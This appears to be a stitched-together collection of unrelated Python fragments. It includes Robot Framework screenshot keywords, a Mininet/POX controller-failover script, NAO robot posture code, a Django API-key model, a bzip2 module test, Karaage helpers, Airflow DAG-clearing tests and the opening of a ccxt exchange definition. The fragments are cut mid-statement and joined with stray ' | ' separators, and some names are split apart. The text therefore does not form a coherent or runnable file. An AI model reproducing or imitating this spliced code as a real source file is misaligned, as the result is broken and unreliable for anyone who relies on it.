"""Sets the directory where screenshots are saved.
It is possible to use `/` as a path separator in all operating systems.
Path to the old directory is returned.
The directory can also be set in `importing`.
"""
path = self._norm_path(path)
if not os.path.isdir(path):
raise RuntimeError("Directory '%s' does not exist." % path)
old = self._screenshot_dir
self._given_screenshot_dir = path
return old
def take_screenshot(self, name="screenshot", width="800px"):
"""Takes a screenshot in JPEG format and embeds it into the log file.
Name of the file where the screenshot is stored is derived from the
given `name`. If the `name` ends with extension `.jpg` or `.jpeg`,
the screenshot will be stored with that exact name. Otherwise a unique
name is created by adding an underscore, a running index and
an extension to the `name`.
The name will be interpreted to be relative to the directory where
the log file is written. It is also possible to use absolute paths.
Using `/` as a path separator works in all operating systems.
`width` specifies the size of the screenshot in the log file.
Examples: (LOGDIR is determined automatically by the library)
| Take Screenshot | | | # LOGDIR/screenshot_1.jpg (index automatically incremented) |
| Take Screenshot | mypic | | # LOGDIR/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | ${TEMPDIR}/mypic | | # /tmp/mypic_1.jpg (index automatically incremented) |
| Take Screenshot | pic.jpg | | # LOGDIR/pic.jpg (always uses this file) |
| Take Screenshot | images/login.jpg | 80% | # Specify both name and width. |
| Take Screenshot | width=550px | | # Specify only width. |
The path where the screenshot is saved is returned.
"""
path = self._save_screenshot(name)
self._embed_screenshot(path, width)
return path
def take_screenshot_without_embedding(self, name="screenshot"):
"""Takes a screenshot and links it from the log file.
This keyword is otherwise identical to `Take Screenshot` but the saved
screenshot is not embedded into the log file. The screenshot is linked
so it is nevertheless easily available.
"""
path = self._save_screenshot(name)
self._link_screenshot(path)
return path
def _save_screenshot(self, basename, directory=None):
path = self._get_screenshot_path(basename, directory)
return self._screenshot_to_file(path)
def _screenshot_to_file(self, path):
path = self._validate_screenshot_path(path)
logger.debug('Using %s modules for taking screenshot.'
% self._screenshot_taker.module)
try:
self._screenshot_taker(path)
except:
logger.warn('Taking screenshot failed: %s\n'
'Make sure tests are run with a physical or virtual display.'
% utils.get_error_message())
return path
def _validate_screenshot_path(self, path):
path = utils.abspath(self._norm_path(path))
if not os.path.exists(os.path.dirname(path)):
raise RuntimeError("Directory '%s' where to save the screenshot "
"does not exist" % os.path.dirname(path))
return path
def _get_screenshot_path(self, basename, directory):
directory = self._norm_path(directory) if directory else self._screenshot_dir
if basename.lower().endswith(('.jpg', '.jpeg')):
return os.path.join(directory, basename)
index = 0
while True:
index += 1
path = os.path.join(directory, "%s_%d.jpg" % (basename, index))
if not os.path.exists(path):
return path
def _embed_screenshot(self, path, width):
link = utils.get_link_path(path, self._log_dir)
logger.info('<a href="%s"><img src="%s" width="%s"></a>'
% (link, link, width), html=True)
def _link_screenshot(self, path):
link = utils.get_link_path(path, self._log_dir)
logger |
#!/usr/bin/python
from mininet.net import Mininet
from mininet.node import Controller, RemoteController
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import time
import os
import subprocess
import csv
import StringIO
import iptc
HOSTS = 3
p1_log = open('logs-example/log.p1.txt', 'w')
p2_log = open('logs-example/log.p2.txt', 'w')
def closePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.insert_rule(rule)
def unClosePort(port):
rule=iptc.Rule()
rule.protocol = "tcp"
match = rule.create_match("tcp")
match.dport = str(port)
chain = iptc.Chain(iptc.Table(iptc.Table.FILTER), "INPUT")
rule.target = rule.create_target("DROP")
chain.delete_rule(rule)
def myNet():
global p1
global p2
global p3
global p4
cPort1=6666
cPort2=6667
hosts=[]
kill = 0
net = Mininet( topo=None, build=False, autoSetMacs=True)
con1 = net.addController( 'c0', controller=RemoteController, ip='127.0.0.1', port=cPort1)
con2 = net.addController( 'c1', controller=RemoteController, ip='127.0.0.1', port=cPort2)
for x in range(0, HOSTS):
hostname = "h%d" %(x)
switchname = "s%d" %(x)
host = net.addHost(hostname)
switch = net.addSwitch(switchname)
if (x!=0):
net.addLink(switch, lastswitch)
lastswitch = switch
net.addLink(host,switch)
net.build()
switch.start([con1,con2])
hosts.append(host)
net.start()
tping = time.time()
print 'h0 ping : %.10f' % tping
hosts[0].cmdPrint('hping3 -c 200 -i u20000 ',hosts[1].IP(),' > logs-example/log.ping12.txt 2>&1 &')
#20ms every ping * 200 -> 4s
while True:
tcur = time.time()
if tcur - tping > 2: # after 2s running
# print 'SET ROLE C1 SLAVE '
# p1.stdin.write("import pox.openflow.nicira as nx\n")
# p1.stdin.write("for connection in core.openflow.connections:\n")
# p1.stdin.write("\tconnection.send(nx.nx_role_request(slave='true'))\n")
# p1.stdin.write('\n')
print 'close port %i in %.10f' %(cPort1,tcur)
closePort(cPort1)
break
print 'START C2 AS MASTER at %.10f' %time.time()
p2 = subprocess.Popen(['pox/pox.py',"master67"],stdin=subprocess.PIPE, stdout=p2_log,stderr=p2_log,preexec_fn=os.setpgrp)
while True:
p = subprocess.Popen(["ovs-vsctl", "-f", "csv", "list", "controller"], stdout=subprocess.PIPE)
output, err = p.communicate()
f = StringIO.StringIO(output)
reader = csv.reader(f, delimiter=',')
rownum = 0
con66 = [] # not using this for now
con67 = []
for row in reader:
uuid = row[0]
target = row[15]
role = row[13]
i = target.find(str(cPort2))
if i != -1:
if (role == 'master'):
con67.append(uuid)
f.close()
if len(con67) == HOSTS:
uptime = time.time()
print 'new master ready at %.10f' %uptime
break
print 'now wait for hping3 to finish..'
hosts[0].cmdPrint('wait %hping3')
print 'hping3 finished at %.10f' %time.time()
print 'open the port..'
unClosePort(cPort1)
print 'stopping mininet'
net.stop()
print 'stopping pox(s)..'
p1.terminate()
p2.terminate()
print 'timestamp difference %.10f' %(uptime-tcur)
if __ | name__ == '__main__':
setLogLevel( 'info' )
p1 = subprocess.Popen(['pox/pox.py', "master66"],stdin=subprocess.PIPE, stdout=p1_log,stderr=p1_log,preexec_fn=os. | setpgrp)
print 'c1 runs, master'
print 'wait for 3 seconds...'
time.sleep(3)
myNet()
print 'close pox logs..'
p1_log.close()
p2_log.close()
print 'bye'
# t.process.terminate() |
)
self.leds = Leds(self)
self.audio = Audio(self)
# head
self.head = Head(self)
# arms
self.hands = Hands(self)
self.wrists = Wrists(self, self.hands)
self.elbows = Elbows(self, self.wrists, self.hands)
self.arms = Arms(self, self.elbows, self.wrists, self.hands)
# legs
self.feet = Feet(self)
self.legs = Legs(self, self.feet)
# global duration
self.set_duration(1.5)
def log(self, msg):
if (self.log_function):
self.log_function(str(datetime.now()) + "|" + msg)
else:
self.logger.debug(str(datetime.now()) + "|" + msg)
###################################
# text to speech
###################################
def say(self, text):
self.env.tts.post.say(text)
return self;
def say_and_block(self, text):
self.env.tts.say(text)
return self;
def wait(self, seconds):
time.sleep(seconds)
return self;
###################################
# Postures
###################################
def stand_init(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandInit", speed))
taskId = self.env.robotPosture.post.goToPosture("StandInit", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit_relax(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("SitRelax", speed))
taskId = self.env.robotPosture.post.goToPosture("SitRelax", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand_zero(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("StandZero", speed))
taskId = self.env.robotPosture.post.goToPosture("StandZero", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_belly(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBelly", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBelly", speed)
self.jobs.append(taskId)
self.go()
return self;
def lying_back(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("LyingBack", speed))
taskId = self.env.robotPosture.post.goToPosture("LyingBack", speed)
self.jobs.append(taskId)
self.go()
return self;
def stand(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Stand", speed))
self.env.robotPosture.goToPosture("Stand", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
def crouch(self, speed=.5):
self.log("goToPosture=%s|speed=%s" % ("Crouch", speed))
taskId = self.env.robotPosture.post.goToPosture("Crouch", speed)
self.jobs.append(taskId)
self.go()
return self;
def sit(self, speed | =.5):
self.log("goToPosture=%s|speed=%s" % ("Sit", speed))
self.env.robotPosture.post.goToPosture("Sit", speed)
self.env.motion.waitUntilMoveIsFinished();
return self;
###################################
# stiffness
###################################
def stiff(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 1.0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation( | pNames, pStiffnessLists, pTimeLists)
return self;
def rest(self):
self.env.motion.rest()
return self;
def relax(self):
pNames = self.joints.Chains.Body
pStiffnessLists = 0
pTimeLists = 1.0
self.env.motion.stiffnessInterpolation(pNames, pStiffnessLists, pTimeLists)
return self;
###################################
# Whole Body Motion & Balance
###################################
def whole_body_disable(self):
self.log("wbDisable")
isEnabled = False
self.env.motion.wbEnable(isEnabled)
def whole_body_enable(self):
self.log("wbEnable")
isEnabled = True
self.env.motion.wbEnable(isEnabled)
def foot_state(self, supportLeg="Legs", stateName="Fixed"):
# Legs are constrained fixed
# supportLeg: Legs, LLeg or RLeg
# stateName: Fixed, Plane or Free
self.log("supportLeg=%s|stateName=%s" % (supportLeg, stateName))
self.env.motion.wbFootState(stateName, supportLeg)
def constrain_motion(self, supportLeg="Legs"):
# Constraint Balance Motion / Support Polygon
# supportLeg: Legs, LLeg or RLeg
isEnable = True
self.env.motion.wbEnableBalanceConstraint(isEnable, supportLeg)
def balance(self, leg, duration):
duration = self.determine_duration(duration)
# stiffen body
self.stiff()
self.whole_body_endable()
self.foot_state()
self.constrain_motion()
# Com go to LLeg
supportLeg = leg
self.env.motion.wbGoToBalance(supportLeg, duration)
self.whole_body_disable()
###################################
# Duration
###################################
def set_duration(self, durationInSeconds):
self.globalDuration = durationInSeconds
return self;
def determine_duration(self, durationInSeconds):
if durationInSeconds > 0:
return durationInSeconds
return self.globalDuration
###################################
# blocking
###################################
def go(self):
for taskId in self.jobs:
self.log("taskId=%s|action=wait" % (taskId))
d1 = datetime.now()
self.env.motion.wait(taskId, 8000)
d2 = datetime.now()
r = d2 - d1
self.log("taskId=%s|action=done|seconds=%s" % (taskId, r.total_seconds()))
self.jobs[:] = []
self.log("done")
return self
###################################
# movement
###################################
def move(self, chain, angleListInRadians, timeListInSeconds):
# motion w/ blocking call
taskId = self.env.motion.post.angleInterpolation(chain, angleListInRadians, timeListInSeconds, True)
# log
self.log("|taskId=%s|chain=%s|angleList=%s" % (taskId, chain, angleListInRadians))
self.jobs.append(taskId)
def move_with_degrees_and_duration(self, jointName, angleInDegrees, durationInSeconds):
# convert to radians
angleInRadians = angleInDegrees * almath.TO_RAD
# move
self.move(jointName, [angleInRadians], durationInSeconds)
###################################
# helpers
###################################
def get_target_angles_for_chain(self, chain, angle):
# Get the Number of Joints
numBodies = len(self.env.motion.getJointNames(chain))
# We prepare a collection of floats
return [angle] * numBodies
def get_max_degrees_per_second(self, jointName):
limits = self.env.motion.getLimits(jointName);
minAngle = limits[0][0]
maxAngle = limits[0][1]
maxChange = limits[0][2] # in rad.s-1
#self.log("maxChange: " + str(maxChange) + " for " + jointName)
return math.degrees(maxChange)
def get_fraction_max_speed(self, jointName, desiredPositionInDegrees, executionTimeInSeconds):
# current position in degrees
useSensors = False;
currentPositionInDegrees = math.degrees(self.env.motion.getAngles(jointName, useSensors)[0]);
#self.log("pos in deg: " + str(currentPositionInDegrees))
# distance
distanceInDegrees = abs(currentPositionInDegrees - desiredPositionInDegrees)
#self.log("distance: " + str(distanceInDegrees))
# max speed
maxDegreesPerSecond = self.get_max_degrees_per_second(jointName)
# fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
fractionOfMaxSpeed = (distanceInDegrees) / (maxDegreesPerSecond * executionTimeInSeconds)
if fraction |
import binascii
import os
import random
from django.db import models
from django.utils.encoding import force_text, python_2_unicode_compatible
from aesfield.field import AESField
from olympia.amo.fields import PositiveAutoField
from olympia.amo.models import ModelBase
from olympia.users.models import UserProfile
# These are identifiers for the type of API keys that can be stored
# in our database.
SYMMETRIC_JWT_TYPE = 1
API_KEY_TYPES = [
SYMMETRIC_JWT_TYPE,
]
@python_2_unicode_compatible
class APIKey(ModelBase):
"""
A developer's key/secret pair to access the API.
"""
id = PositiveAutoField(primary_key=True)
user = models.ForeignKey(UserProfile, related_name='api_keys')
# A user can only have one active key at the same time, it's enforced by
# a unique db constraint. Since we keep old inactive keys though, nulls
# need to be allowed (and we need to always set is_active=None instead of
# is_active=False when revoking keys).
is_active = models.NullBooleanField(default=True)
type = models.PositiveIntegerField(
choices=dict(zip(API_KEY_TYPES, API_KEY_TYPES)).items(), default=0)
key = models.CharField(max_length=255, db_index=True, unique=True)
# TODO: use RSA public keys instead? If we were to use JWT RSA keys
# then we'd only need to store the public key.
secret = AESField(aes_key='api_key:secret', aes_prefix=b'aes:')
class Meta:
db_table = 'api_key'
unique_together = (('user', 'is_active'),)
def __str__(self):
return (
u'<{cls} user={user}, type={type}, key={key} secret=...>'
.format(cls=self.__class__.__name__, key=self.key,
type=self.type, user=self.user))
@classmethod
def get_jwt_key(cls, **kwargs):
"""
Return a single active APIKey instance for a given user or key.
"""
kwargs['is_active'] = True
return cls.objects.get(type=SYMMETRIC_JWT_TYPE, **kwargs)
@classmethod
def new_jwt_credentials(cls, user):
"""
Generates a new key/secret pair suitable for symmetric JWT signing.
This method must be run within a db transaction.
Returns an instance of APIKey.
"""
key = cls.get_unique_key('user:{}:'.format(user.pk))
return cls.objects.create(
key=key, secret=cls.generate_secret(32),
type=SYMMETRIC_JWT_TYPE, user=user, is_active=True)
@classmethod
def get_unique_key(cls, prefix, try_count=1, max_tries=1000):
if try_count >= max_tries:
raise RuntimeError(
'a unique API key could not be found after {} tries'
.format(max_tries))
key = '{}{}' | .format(prefix, random.randint(0, 999))
if cls.object | s.filter(key=key).exists():
return cls.get_unique_key(prefix, try_count=try_count + 1,
max_tries=max_tries)
return key
@staticmethod
def generate_secret(byte_length):
"""
Return a true random ascii string containing byte_length of randomness.
The resulting key is suitable for cryptography.
The key will be hex encoded which means it will be twice as long
as byte_length, i.e. 40 random bytes yields an 80 byte string.
byte_length must be at least 32.
"""
if byte_length < 32: # at least 256 bit
raise ValueError(
'{} is too short; secrets must be longer than 32 bytes'
.format(byte_length))
return force_text(binascii.b2a_hex(os.urandom(byte_length)))
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
# Create and bzip2 binary files for the test
binstring = [
b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
]
uncompressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
]
compressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
]
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\ | \x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
chown www-data: -R "$BASE_FOLDER/" |
""".format(
config = config
), shell=True)
self.run_argv = modules.loaded['file_bzip2'].run_argv
def test_compress_decompress(self):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[0]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Recompress it keeping the original file
self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
# Check the existance of the original file and remove it
subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
#Do the same check
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
def test_compress_decompress_multiple(self):
for index in range(0, len(self.compressed)):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[index]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
@log_capture()
def test_already_exists(self, log_captured):
# Decompress keeping it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Do it again and trigger that the file decompressed already exists
self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping decompressing" % self.uncompressed[0])
# Compress and trigger that the file compressed already exists
self.assertIsNone(self.run_argv([self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping compressing" % self.compressed[0])
@log_capture()
def test_wrong_ext(self, log_captured):
# Decompress it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Decompress the decompressed, wrong ext
self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"Unknown suffix, skipping decompressing")
@log_capture()
def test_unexistant(self, log_captured):
# Decompress it and check test file
self.assertIsNone(self.run_argv(["--decompress", 'bogus']));
self.assertEqual(log_captured.records[-1].msg,
"Skipping file '%s', check existance and permission" % 'bogus')
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
if default_start is None:
default_start = datetime.date.today() - datetime.timedelta(days=90)
if default_end is None:
default_end = datetime.date.today()
today = datetime.date.today()
if 'start' in request.GET:
try:
years, months, days = request.GET['start'].split('-')
start = datetime.datetime(int(years), int(months), int(days))
start = start.date()
except ValueError:
start = today - datetime.timedelta(days=90)
else:
start = default_start
if 'end' in request.GET:
try:
years, months, days = request.GET['end'].split('-')
end = datetime.datetime(int(years), int(months), int(days))
end = end.date()
except ValueError:
end = today
else:
end = default_end
return start, end
def get_current_person():
user = get_current_user()
if user is None:
return None
if not user.is_authenticated:
return None
return user
class log():
def __init__(self, user, obj, flag, message):
warnings.warn("Calling karaage.common.log directly has been"
" deprecated. You should use the API "
"log.(add|change|field_change|delete|comment)",
DeprecationWarning)
LogEntry.objects.log_object(obj, flag, message, user)
@classmethod
def add(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, ADDITION, message, user)
@classmethod
def change(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, CHANGE, message, user)
@classmethod
def field_change(cls, obj, user=None, field=None, new_value=None):
return LogEntry.objects.log_object(
obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)
@classmethod
def delete(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, DELETION, message, user)
@classmethod
def comment(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, COMMENT, message, user)
def new_random_token():
import random
from hashlib import sha1
# Use the system (hardware-based) random number generator if it exists.
if hasattr(random, 'SystemRandom'):
randrange = random.SystemRandom().randrange
else:
randrange = random.randrange
max_key = 18446744073709551616 # 2 << 63
string = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
return sha1(string.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
result = QueryDict("", mutable=True)
result['content_type'] = ContentType.objects.get_for_model(obj).pk
result['object_id'] = obj.pk
url = reverse('kg_log_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
def add_comment(request, breadcrumbs, obj):
assert obj is not None
assert obj.pk is not None
form = CommentForm(
data=request.POST or None, obj=obj,
request=request, instance=None)
if request.method == 'POST':
form.save()
return HttpResponseRedirect(obj.get_absolute_url())
return render(
template_name='karaage/common/add_comment.html',
context={
'form': form, 'obj': obj,
'breadcrumbs': breadcrumbs,
},
request=request)
def is_admin(request):
if settings.ADMIN_IGNORED:
return False
if not request.user.is_authenticated:
return False
return request.user.is_admin
def get_app_modules(na | me):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
if isinstance(config, BasePlugin):
module_name = config.na | me + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
for module in get_app_modules("urls"):
urls = getattr(module, name, None)
if urls is not None:
yield urls
|
g_bag.get_dag('child_dag_1').get_dagrun(execution_date=day_2, session=session)
assert dagrun_0_1.state == State.QUEUED
assert dagrun_0_2.state == State.QUEUED
assert dagrun_1_1.state == State.QUEUED
assert dagrun_1_2.state == State.SUCCESS
def test_external_task_marker_future(dag_bag_ext):
"""
Test clearing tasks with no end_date. This is the case when users clear tasks with
Future, Downstream and Recursive selected.
"""
date_0 = DEFAULT_DATE
date_1 = DEFAULT_DATE + timedelta(days=1)
tis_date_0 = run_tasks(dag_bag_ext, execution_date=date_0)
tis_date_1 = run_tasks(dag_bag_ext, execution_date=date_1)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
# This should clear all tasks on dag_0 to dag_3 on both date_0 and date_1
clear_tasks(dag_bag_ext, dag_0, task_a_0, end_date=None)
ti_a_0_date_0 = tis_date_0["task_a_0"]
ti_b_3_date_0 = tis_date_0["task_b_3"]
ti_b_3_date_1 = tis_date_1["task_b_3"]
assert_ti_state_equal(ti_a_0_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_0, State.NONE)
assert_ti_state_equal(ti_b_3_date_1, State.NONE)
def test_external_task_marker_exception(dag_bag_ext):
"""
Clearing across multiple DAGs should raise AirflowException if more levels are being cleared
than allowed by the recursion_depth of the first ExternalTaskMarker being cleared.
"""
run_tasks(dag_bag_ext)
dag_0 = dag_bag_ext.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
task_b_0 = dag_0.get_task("task_b_0")
task_b_0.recursion_depth = 2
with pytest.raises(AirflowException, match="Maximum recursion depth 2"):
clear_tasks(dag_bag_ext, dag_0, task_a_0)
@pytest.fixture
def dag_bag_cyclic():
"""
Create a DagBag with DAGs having cyclic dependencies set up by ExternalTaskMarker and
ExternalTaskSensor.
dag_0: task_a_0 >> task_b_0
^ |
| |
dag_1: | ---> task_a_1 >> task_b_1
| ^
| |
dag_n: | ---> task_a_n >> task_b_n
| |
-----------------------------------------------------
"""
def _factory(depth: int) -> DagBag:
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
dags = []
with DAG("dag_0", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a_0 = DummyOperator(task_id="task_a_0")
task_b_0 = ExternalTaskMarker(
task_id="task_b_0", external_dag_id="dag_1", external_task_id="task_a_1", recursion_depth=3
)
task_a_0 >> task_b_0
for n in range(1, depth):
with DAG(f"dag_{n}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{n}",
external_dag_id=f"dag_{n-1}",
external_task_id=f"task_b_{n-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{n}",
external_dag_id=f"dag_{n+1}",
external_task_id=f"task_a_{n+1}",
recursion_depth=3,
)
task_a >> task_b
# Create the last dag which loops back
with DAG(f"dag_{depth}", start_date=DEFAULT_DATE, schedule_interval=None) as dag:
dags.append(dag)
task_a = ExternalTaskSensor(
task_id=f"task_a_{depth}",
external_dag_id=f"dag_{depth-1}",
external_task_id=f"task_b_{depth-1}",
)
task_b = ExternalTaskMarker(
task_id=f"task_b_{depth}",
external_dag_id="dag_0",
external_task_id="task_a_0",
recursion_depth=2,
)
task_a >> task_b
for dag in dags:
dag_bag.bag_dag(dag=dag, root_dag=dag)
return dag_bag
return _factory
def test_external_task_marker_cyclic_deep(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies. AirflowException should be
raised.
"""
dag_bag = dag_bag_cyclic(10)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
with pytest.raises(AirflowException, match="Maximum recursion depth 3"):
clear_tasks(dag_bag, dag_0, task_a_0)
def test_external_task_marker_cyclic_shallow(dag_bag_cyclic):
"""
Tests clearing across multiple DAGs that have cyclic dependencies shallower
than recursion_depth
"""
dag_bag = dag_bag_cyclic(2)
run_tasks(dag_bag)
dag_0 = dag_bag.get_dag("dag_0")
task_a_0 = dag_0.get_task("task_a_0")
tis = clear_tasks(dag_bag, dag_0, task_a_0, dry_run=True)
assert [
("dag_0", "task_a_0"),
("dag_0", "task_b_0"),
("dag_1", "task_a_1"),
("dag_1", "task_b_1"),
("dag_2", "task_a_2"),
("dag_2", "task_b_2"),
] == sorted((ti.dag_id, ti.task_id) for ti in tis)
@pytest.fixture
def dag_bag_multiple():
"""
Create a DagBag containing two DAGs, linked by multiple ExternalTaskMarker.
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
daily_dag = DAG("daily_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
agg_dag = DAG("agg_dag", start_date=DEFAULT_DATE, schedule_interval="@daily")
dag_bag.bag_dag(dag=daily_dag, root_dag=daily_dag)
dag_bag.bag_dag(dag=agg_dag, root_dag=agg_dag)
daily_task = DummyOperator(task_id="daily_tas", dag=daily_dag)
start = DummyOperator(task_id="start", dag=agg_dag)
for i in ra | nge(25):
task = ExternalTaskMarker(
task_id=f"{daily_task.task_id}_{i}",
external_dag_id=daily_dag.dag_id,
external_task_id=daily_task.task_id,
execution_date="{{ macros.ds_add(ds, -1 * %s) }}" % i,
dag=agg_dag,
)
start >> task
yield dag_bag
@pytest.mark.quarantined
@pytest.mark.backend("postgres", "mysql")
def test_clear_multiple_external_task_ | marker(dag_bag_multiple):
"""
Test clearing a dag that has multiple ExternalTaskMarker.
sqlite3 parser stack size is 100 lexical items by default so this puts a hard limit on
the level of nesting in the sql. This test is intentionally skipped in sqlite.
"""
agg_dag = dag_bag_multiple.get_dag("agg_dag")
for delta in range(len(agg_dag.tasks)):
execution_date = DEFAULT_DATE + timedelta(days=delta)
run_tasks(dag_bag_multiple, execution_date=execution_date)
# There used to be some slowness caused by calling count() inside DAG.clear().
# That has since been fixed. It should take no more than a few seconds to call
# dag.clear() here.
assert agg_dag.clear(start_date=execution_date, end_date=execution_date, dag_bag=dag_bag_multiple) == 51
@pytest.fixture
def dag_bag_head_tail():
"""
Create a DagBag containing one DAG, with task "head" depending on task "tail" of the
previous execution_date.
20200501 20200502 20200510
+------+ +------+ +------+
| head | -->head | --> -->head |
| | | / | | | / / | | |
| v | / | v | / / | v |
| body | / | body | / ... / | body |
| | |/ | | |/ / | | |
| v / | v / / | v |
| tail/| | tail/| / | tail |
+------+ +------+ +------+
"""
dag_bag = DagBag(dag_folder=DEV_NULL, include_examples=False)
with DAG("head_tail", start_date=DEFAULT_DATE, schedule_interval="@daily") as dag:
head = ExternalTaskSensor(
task_id='head',
external_dag_id=dag.dag_id,
external_task |
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
def describe(self):
return self.deep_extend(super(bit2c, self).describe(), {
'id': 'bit2c',
'name': 'Bit2C',
'countries': 'IL', # Israel
'rateLimit': 3000,
'hasCORS': False,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
'api': 'https://www.bit2c.co.il',
'www': 'https://www.bit2c.co.il',
'doc': [
'https://www.bit2c.co.il/home/api',
